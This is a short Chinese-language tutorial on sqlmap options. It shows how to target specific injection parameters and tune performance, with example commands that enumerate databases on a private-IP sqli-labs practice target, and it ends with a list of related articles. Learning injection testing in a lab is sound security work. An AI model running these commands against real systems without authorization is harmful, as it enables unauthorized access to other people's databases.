注入工具 -- sqlmap(指定位置注入和优化性能)

简介: 注入工具 -- sqlmap(指定位置注入和优化性能)

一、指定位置注入


1、-p,指定具体探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测

2、–skip,忽略探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测,这里忽略了host

3、–param-exclude,忽略包含具体内容的参数

–param-exclude=“id|name”

4、–skip-static 忽略非动态参数

5、用“*”指定注入位置,

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs

二、优化性能


1、设置连接为持久连接

http报文中设置Connection:Keep-Alive

sqlmap中加参数 --keep-alive

2、设置不接受http当中的body,常用在盲注

–null-connection

3、设置多线程

–thread 默认是1个线程,最大线程为10

4、预测输出

–predict-output,不能与thread同时用

5、开启所有优化

-o

禁止非法,后果自负

目录
相关文章
|
6月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
65 0
【干货】sql-labs、请求方式、注入类型、拼接方式
【干货】sql-labs、请求方式、注入类型、拼接方式
|
6月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
105 0
|
SQL 关系型数据库 MySQL
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
293 0
|
6月前
|
安全 Python
注入工具 -- DSSS
注入工具 -- DSSS
51 0
|
6月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
57 0
|
6月前
|
安全 数据库
注入工具 -- sqlmap(枚举信息)
注入工具 -- sqlmap(枚举信息)
55 0
|
6月前
|
SQL 数据库
SQL注入基础(报错注入及延时注入)
SQL注入基础(报错注入及延时注入)
49 0
|
6月前
|
数据库 数据安全/隐私保护 数据库管理
注入工具 -- sqlmap(检索DBMS信息)
注入工具 -- sqlmap(检索DBMS信息)
231 0
|
SQL XML 安全
SQLMap注入工具
SQLMap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。